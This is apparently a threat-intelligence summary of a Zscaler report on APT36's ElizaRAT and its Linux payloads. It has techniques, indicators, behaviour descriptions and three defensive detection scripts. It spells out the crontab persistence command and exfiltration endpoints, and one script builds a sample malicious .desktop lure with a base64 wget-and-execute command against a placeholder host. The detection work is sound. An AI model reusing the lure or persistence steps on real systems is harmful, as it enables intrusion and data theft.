Keypoints
- APT36 deployed a new .NET-based Windows backdoor dubbed ElizaRAT, delivered in password-protected archives hosted on Google Drive.
- ElizaRAT is compiled as Control Panel applets (.cpl), embeds assemblies with Costura, and uses the Telegram API for C2 commands.
- New Linux attack vectors use malicious .desktop files to wget payloads and decoy PDFs, then chmod/execute payloads and set cron-based persistence.
- Linux payloads include Mythic/Poseidon binaries and Python-compiled ELF utilities for file exfiltration and Firefox session theft.
- Linux desktop entries have been inflated (binary padding with millions of “#” characters) to attempt evasion of scanners.
- Python-based tools search common user paths (/media, Downloads, Documents, Desktop) and exfiltrate archives via HTTP POST to attacker-controlled endpoints.
- C2s include Telegram bots for Windows and HTTPS/port-7443 Mythic panels for Linux implants.
MITRE Techniques
- [T1218.002] System Binary Proxy Execution: Control Panel – ElizaRAT is packaged and executed as a Control Panel applet (.cpl) to run via rundll32. (‘ElizaRAT is distributed in the form of Control Panel applet file format (cpl).’)
- [T1567.002] Exfiltration Over Web Service – ElizaRAT and other tools use web services for communications; ElizaRAT uses Telegram API for C2. (‘ElizaRAT uses the Telegram API for C2 communication.’)
- [T1564.001] Hide Artifacts: Hidden Files and Directories – Linux .desktop files create hidden directories (e.g., ~/.local/share) and drop payloads there. (‘Linux desktop entry file downloads and drops binaries in hidden directories.’)
- [T1036] Masquerading: Match Legitimate Name or Location – Attackers name .desktop files and binaries to resemble PDFs or utilities (Icon=application-pdf, names like pickle-help). (‘Linux desktop entry file downloads and drops binaries in hidden directories.’)
- [T1027.001] Obfuscated Files or Information: Binary Padding – Desktop entry files are inflated by adding >1M “#” characters to evade scanners. (‘More than a million “#” characters are added to the Linux desktop entry file to inflate its file size and potentially bypass security scanning solutions.’)
Indicators of Compromise
- [File Hash – Windows] ElizaRAT sample – fc99daa2e1b47bae4be51e5e59aef1f0 (AgendaMeeting.cpl), 66a69bf967bb882e34b1c32081a9ccee (TextSource.cpl) and other Windows RAT hashes.
- [File Hash – Linux payloads] Mythic/Payload binaries – 98279047a7db080129e5ec84533822ef (pickle-help), 248d4e6bb0f32afd7a1cfb975910235a (ziputils-help), and additional ELF hashes.
- [Filenames] Malicious Control Panel applets & Linux desktop files – AgendaMeeting.cpl, approved_copy.desktop (and other .desktop filenames used to present decoys).
- [Domains] Hosting and distribution – admin-dept[.]in, email9ov[.]in (phishing redirector), plus several .in domains used to host decoys and payloads.
- [IP Addresses] Payload/C2 hosts – 103.2.232[.]82 (payload host), 64.227.138[.]127 (payload host), and other hosting IPs like 64.227.133[.]222.
- [C2 Servers] Mythic C2 panels – 108.61.163[.]195:7443, 64.176.40[.]100:7443 (access via /new/login).
- [Download Links] Google Drive archives distributing ElizaRAT – hxxps://drive.google.com/uc?export=download&id=1SaBv9C5EJlXKCQQ_8Tlkl1cBJ9-9XN8u, hxxps://drive.google.com/uc?export=download&id=140KPyaNuYZgOhP3Q7sTQPZ6a-q6x5j-h
ElizaRAT deployment and runtime: operators package .NET CPL binaries into password-protected ZIP archives hosted on Google Drive; the CPL entrypoint (CplApplet) transfers control to Program.Main → MainAsync where the RAT initializes a Telegram bot (Communicate.ConnectMe), creates %appdata%\TextSource, generates a machine-specific UUID/username using WMI (processorID/UUID), drops a decoy PDF from its resources, and establishes persistence by creating a LNK in the Windows Startup folder that executes the control panel applet via rundll32. The RAT performs both local logging (File.AppendAllText) and remote logging via Telegram, enforces a C2 command format of **, and implements commands such as /dir, /upload, /getprocess (writes getproc.dll), /run, /delete, /end, /online, /identity (e.g., hxxps://api.ipify[.]org), /ping, /scr (writes scr.dll), and /createdir.
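One way to surface the Windows behaviours described above in endpoint telemetry, as an added example that is not part of the Zscaler write-up or any tool it describes: the events below are constructed in a Sysmon-like shape (the field names type, image, cmdline, target and dest_host are assumptions), and the three rules flag rundll32 loading a .cpl from outside the Windows directory, a write into the per-user Startup folder, and a connection to the Telegram API from a process that is not a browser or messaging client.

```python
import re
from typing import Dict, Iterable, List, Optional, Tuple

# Constructed sample events in a Sysmon-like shape (field names are assumptions,
# not real telemetry). Paths mirror the behaviour described for ElizaRAT.
SAMPLE_EVENTS: List[Dict] = [
    {"type": "process", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r'rundll32.exe shell32.dll,Control_RunDLL "C:\Users\alice\AppData\Roaming\TextSource\AgendaMeeting.cpl"'},
    {"type": "process", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe shell32.dll,Control_RunDLL C:\Windows\System32\timedate.cpl"},
    {"type": "file", "image": r"C:\Windows\System32\rundll32.exe",
     "target": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AgendaMeeting.lnk"},
    {"type": "network", "image": r"C:\Windows\System32\rundll32.exe",
     "dest_host": "api.telegram.org", "dest_port": 443},
    {"type": "network", "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dest_host": "api.telegram.org", "dest_port": 443},
]

# Rule 1: rundll32 loading a Control Panel applet from a non-system location.
# Built-in applets live under %SystemRoot%; anything else is worth a look
# (heuristic: some third-party software installs applets under Program Files).
CPL_PATH = re.compile(r'"?([A-Za-z]:\\[^"]*?\.cpl)"?', re.IGNORECASE)
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64")

# Rule 2: any file landing in the per-user Startup folder (LNK persistence).
STARTUP_DIR = re.compile(r"\\start menu\\programs\\startup\\", re.IGNORECASE)

# Rule 3: Telegram API reached by something other than a browser or the Telegram client.
EXPECTED_TELEGRAM_CLIENTS = ("firefox.exe", "chrome.exe", "msedge.exe", "telegram.exe")


def cpl_outside_windows(cmdline: str) -> Optional[str]:
    """Return the .cpl path when rundll32 loads an applet from outside the Windows directory."""
    if "rundll32" not in cmdline.lower():
        return None
    match = CPL_PATH.search(cmdline)
    if not match:
        return None
    path = match.group(1)
    if path.lower().startswith(SYSTEM_DIRS):
        return None
    return path


def startup_folder_write(event: Dict) -> Optional[str]:
    """Return the written path when a file-create event targets the Startup folder."""
    target = event.get("target", "")
    return target if STARTUP_DIR.search(target) else None


def telegram_from_unexpected_process(event: Dict) -> Optional[str]:
    """Return 'image -> host' when a non-client process talks to telegram.org."""
    host = event.get("dest_host", "").lower()
    image = event.get("image", "").lower().rsplit("\\", 1)[-1]
    if host.endswith("telegram.org") and image not in EXPECTED_TELEGRAM_CLIENTS:
        return f"{image} -> {host}"
    return None


def triage(events: Iterable[Dict]) -> List[Tuple[str, str]]:
    """Run the three rules over an event stream and return (rule, detail) findings."""
    findings: List[Tuple[str, str]] = []
    for ev in events:
        kind = ev.get("type")
        if kind == "process":
            hit = cpl_outside_windows(ev.get("cmdline", ""))
            if hit:
                findings.append(("cpl_outside_windows", hit))
        elif kind == "file":
            hit = startup_folder_write(ev)
            if hit:
                findings.append(("startup_folder_write", hit))
        elif kind == "network":
            hit = telegram_from_unexpected_process(ev)
            if hit:
                findings.append(("telegram_api_from_unexpected_process", hit))
    return findings


if __name__ == "__main__":
    for rule, detail in triage(SAMPLE_EVENTS):
        print(f"[{rule}] {detail}")
```

Each rule on its own is noisy (Control Panel applets run through rundll32 legitimately, and the Startup folder is written by installers); the value is in correlating them on one host within a short window, which is what the triage loop is set up to feed.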
Linux delivery and execution: attackers distribute ZIP archives containing malicious .desktop files that execute shell commands (often base64-encoded) which wget decoy PDFs and ELF payloads into /tmp or ~/.local/share, chmod +x them, open the decoy via LibreOffice or xdg-open, then execute the payload (e.g., 185.elf, pickle-help, ziputils-help). Variants inflate .desktop files by appending >1M “#” characters to evade scanners. Post-download actions include creating hidden directories (~/.local/share), writing a short reboot-and-run script to /dev/shm/myc.txt, registering it with crontab (crontab -u `whoami` /dev/shm/myc.txt), removing the script, and launching the payload to achieve persistence and execution.
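A static triage routine for the Linux .desktop lures described above, written as an added example (not code from the Zscaler write-up or from the tooling it describes). It parses the key=value entries, measures how many bytes sit in "#" comment lines (the padding trick), decodes any base64 blob embedded in the Exec line and pattern-matches the decoded command for the download, chmod +x, decoy-open and hidden-directory steps. The sample .desktop file is constructed here, the padding threshold is an assumption, and the download host is a placeholder.

```python
import base64
import re
from typing import Dict, List

PAD_THRESHOLD = 100_000  # assumed cut-off: bytes of '#' comment lines before a file counts as inflated
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")
SUSPICIOUS = [
    ("downloader", r"\b(wget|curl)\b"),
    ("chmod_exec", r"\bchmod\s+\+x\b"),
    ("crontab", r"\bcrontab\b"),
    ("dev_shm", r"/dev/shm/"),
    ("hidden_dir", r"\.local/share|\.config/"),
    ("decoy_open", r"\b(xdg-open|libreoffice)\b"),
]

# Constructed sample modelled on the described lure; the host is a placeholder, not an IOC.
_PAYLOAD_CMD = (
    "wget -q -O /tmp/decoy.pdf http://payload-host.invalid/decoy.pdf; "
    "mkdir -p ~/.local/share; wget -q -O ~/.local/share/pickle-help http://payload-host.invalid/p; "
    "chmod +x ~/.local/share/pickle-help; xdg-open /tmp/decoy.pdf; ~/.local/share/pickle-help"
)
_B64 = base64.b64encode(_PAYLOAD_CMD.encode()).decode()
SAMPLE_DESKTOP = (
    "[Desktop Entry]\nType=Application\nName=approved_copy.pdf\nIcon=application-pdf\n"
    f'Exec=bash -c "echo {_B64} | base64 -d | bash"\nTerminal=false\n'
    + "#" * 1_200_000 + "\n"          # the inflation padding
)
BENIGN_DESKTOP = "[Desktop Entry]\nType=Application\nName=Text Editor\nExec=gedit %U\nIcon=accessories-text-editor\n"


def decode_embedded_base64(command: str) -> str:
    """Return the decoded text of any base64 blob embedded in the command, or '' if none."""
    out: List[str] = []
    for token in B64_TOKEN.findall(command):
        try:
            text = base64.b64decode(token, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
            continue
        if text.replace("\n", " ").isprintable():
            out.append(text)
    return "\n".join(out)


def analyze_desktop(text: str) -> Dict:
    """Parse a .desktop file and return keys, padding size, decoded Exec and findings."""
    keys: Dict[str, str] = {}
    padding = 0
    for line in text.splitlines():
        if line.startswith("#"):
            padding += len(line)          # comment lines are where the padding hides
            continue
        if line.startswith("[") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        keys[key.strip()] = value.strip()

    exec_cmd = keys.get("Exec", "")
    decoded = decode_embedded_base64(exec_cmd)
    findings: List[str] = []
    if padding >= PAD_THRESHOLD:
        findings.append(f"padding: {padding} bytes of comment lines")
    if keys.get("Type") == "Application" and keys.get("Icon", "").startswith("application-pdf"):
        findings.append("pdf_icon: executable entry presenting itself as a PDF")
    if decoded:
        findings.append("base64_exec: Exec runs a base64-encoded command")
    for name, pattern in SUSPICIOUS:
        match = re.search(pattern, exec_cmd + "\n" + decoded)
        if match:
            findings.append(f"{name}: {match.group(0)}")
    return {"keys": keys, "padding_bytes": padding, "decoded_exec": decoded, "findings": findings}


if __name__ == "__main__":
    report = analyze_desktop(SAMPLE_DESKTOP)
    print("decoded Exec:", report["decoded_exec"])
    for finding in report["findings"]:
        print(" -", finding)
```

Because the padding is counted rather than skipped, the same routine also gives a size-independent answer on inflated files: a scanner that truncates or refuses large inputs is exactly what the padding is meant to defeat, so the check should run on the parsed keys, not on the raw file size.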
Linux espionage tools and exfiltration: Python-compiled ELF utilities (PyInstaller) perform targeted collection and exfiltration. GLOBSHELL-type binaries recursively scan /media and user paths (Downloads, Documents, Desktop, Pictures, Trash) for predefined extensions, copy matches to ~/.config/bossconfig/usnconfig/, archive to usnconfig.zip and POST it (with username/hostname/timestamp) to hxxp://baseuploads[.]com/myf/test.php. PYSHELLFOX-style utilities locate live Firefox sessionstore backups (files beginning with the magic bytes mozLz40\x00), LZ4-decompress JSON session data, check tab titles/URLs (e.g., email.gov.in/#, inbox, web.whatsapp.com) and if matched archive ~/.mozilla/firefox into /dev/shm/firefox.zip and exfiltrate to the same POST endpoint. Separately, some Linux payloads are Mythic Poseidon implants contacting HTTPS C2s on port 7443 (e.g., 108.61.163[.]195:7443) for further operator control.
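A host-side hunt for the Linux persistence and collection artifacts named in the two paragraphs above, added here as an example rather than taken from the Zscaler write-up or its tooling. It parses a `crontab -l` listing (including @reboot-style entries) and flags commands that run out of /dev/shm, /tmp or ~/.local/share, then matches a path listing against the staging directory, archive names and "-help" binaries described. The crontab text and path list are constructed; collect_paths() is provided for running it against a real home directory.

```python
import os
import re
from typing import Dict, Iterable, List, Tuple

# Artifact locations taken from the behaviour described above; the regexes are
# assumptions about how they appear in a path listing.
ARTIFACT_PATTERNS: List[Tuple[str, str]] = [
    ("cron_stage_script", r"^/dev/shm/myc\.txt$"),
    ("firefox_profile_archive", r"^/dev/shm/firefox\.zip$"),
    ("collector_staging_dir", r"/\.config/bossconfig/usnconfig(/|$)"),
    ("collector_archive", r"/usnconfig\.zip$"),
    ("hidden_share_helper", r"/\.local/share/[^/]*-help$"),  # pickle-help, ziputils-help naming
]
CRON_SUSPECT_DIRS = re.compile(r"/dev/shm/|/tmp/|/\.local/share/")

# Constructed sample inputs (not from a real host).
SAMPLE_CRONTAB = """# m h dom mon dow command
MAILTO=alice
0 3 * * * /usr/bin/apt-get update
@reboot sleep 30 && ~/.local/share/pickle-help
"""
SAMPLE_PATHS = [
    "/usr/bin/python3",
    "/home/alice/.local/share/applications/firefox.desktop",
    "/home/alice/.config/bossconfig/usnconfig/usnconfig.zip",
    "/home/alice/.local/share/pickle-help",
    "/dev/shm/firefox.zip",
]


def parse_crontab(text: str) -> List[Dict[str, str]]:
    """Split a crontab listing into schedule/command pairs; skips comments and VAR=value lines."""
    entries: List[Dict[str, str]] = []
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        if stripped.startswith("@"):                 # @reboot, @daily, ...
            parts = stripped.split(None, 1)
            if len(parts) != 2:
                continue
            schedule, command = parts
        else:                                        # five time fields then the command
            parts = stripped.split(None, 5)
            if len(parts) < 6:
                continue
            schedule, command = " ".join(parts[:5]), parts[5]
        entries.append({"schedule": schedule, "command": command})
    return entries


def collect_paths(root: str) -> List[str]:
    """Walk a directory tree and return every path under it, for use as hunt() input on a live host."""
    found: List[str] = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            found.append(os.path.join(dirpath, name))
    return found


def hunt(crontab_text: str, paths: Iterable[str]) -> List[Tuple[str, str]]:
    """Return (artifact, detail) findings from a crontab listing and a path listing."""
    findings: List[Tuple[str, str]] = []
    for entry in parse_crontab(crontab_text):
        if CRON_SUSPECT_DIRS.search(entry["command"]):
            findings.append(("cron_entry", f"{entry['schedule']} {entry['command']}"))
    for path in paths:
        for name, pattern in ARTIFACT_PATTERNS:
            if re.search(pattern, path):
                findings.append((name, path))
    return findings


if __name__ == "__main__":
    for artifact, detail in hunt(SAMPLE_CRONTAB, SAMPLE_PATHS):
        print(f"[{artifact}] {detail}")
```

On a real host the crontab comes from `crontab -l` for each user and the path list from collect_paths() over the home directories and /dev/shm; because the dropper removes /dev/shm/myc.txt after installing it, the cron entry it left behind is usually the more durable artifact.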
Read more: https://www.zscaler.com/blogs/security-research/peek-apt36-s-updated-arsenal